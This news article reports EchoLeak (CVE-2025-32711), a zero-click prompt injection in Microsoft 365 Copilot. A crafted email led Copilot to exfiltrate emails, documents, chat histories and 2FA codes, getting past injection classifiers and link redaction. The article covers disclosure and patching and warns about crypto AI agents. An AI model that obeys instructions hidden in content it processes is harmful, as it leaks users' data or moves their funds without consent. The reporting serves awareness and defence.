A single malicious email could exfiltrate 2FA codes, documents, and chat histories from Microsoft 365 Copilot without any user interaction.
Microsoft quietly fixed a vulnerability rated maximum critical in its M365 Copilot AI platform last Tuesday. The flaw, discovered by security firm Aim Security, allowed attackers to steal sensitive data, including two-factor authentication codes, from emails accessible to Copilot using nothing more than a single carefully crafted message.
The vulnerability, tracked as CVE-2025-32711 and dubbed “EchoLeak,” carried a CVSS severity score of 9.3 out of 10.
How EchoLeak worked #
The attack required zero clicks from the victim. An attacker could send a malicious email that, when processed by Copilot, would trick the AI into exfiltrating organizational data: emails, documents, chat histories, the works. The proof-of-concept exploit demonstrated by Aim Security showed automatic data theft triggered simply by Copilot summarizing or interacting with the poisoned message.
The attack bypassed Microsoft’s existing defenses, including cross-prompt injection classifiers and external link redactions.
Aim Security discovered and responsibly disclosed the vulnerability to Microsoft in January 2025. Microsoft deployed server-side fixes by May 2025, meaning no customer action was required. The company confirmed it had no awareness of any affected customers or malicious exploitation before the patch was applied.
Public disclosure of the vulnerability began emerging around June 11-12, with the researchers revealing their proof-of-concept exploit on Monday.
A recurring pattern in AI security #
The fundamental architecture of LLMs, which process all text in a unified context window, makes it extraordinarily difficult to enforce a security boundary between trusted instructions and untrusted data. Microsoft 365 Copilot integrates large language models with enterprise data sources through Retrieval-Augmented Generation (RAG), and the EchoLeak vulnerability demonstrated how attacker-controlled content in a user’s mailbox could manipulate Copilot into unauthorized disclosures without any user action.
The zero-click nature of the attack makes it particularly concerning for enterprise environments. Organizations deploying M365 Copilot across thousands of employees were potentially exposed without any single user needing to make a mistake. The attack surface was simply “receiving an email.”
What this means for crypto and Web3 #
The crypto industry has been rapidly integrating AI agents into its infrastructure. On-chain AI agents, automated trading bots, AI-powered wallet interfaces, and large language model integrations for DeFi protocols are proliferating. Every one of these implementations faces the same fundamental prompt injection problem that EchoLeak exploited.
If an AI agent managing on-chain transactions can be tricked into following malicious instructions embedded in data it processes, the consequences extend beyond data exfiltration to direct financial loss, including the ability to move funds, sign transactions, or interact with smart contracts. In crypto, where code is often open source and transactions are irreversible, the window between discovery and exploitation tends to be much narrower than in enterprise environments where responsible disclosure and rapid patching contained EchoLeak’s impact.
Disclosure: This article was edited by Editorial Team. For more information on how we create and review content, see our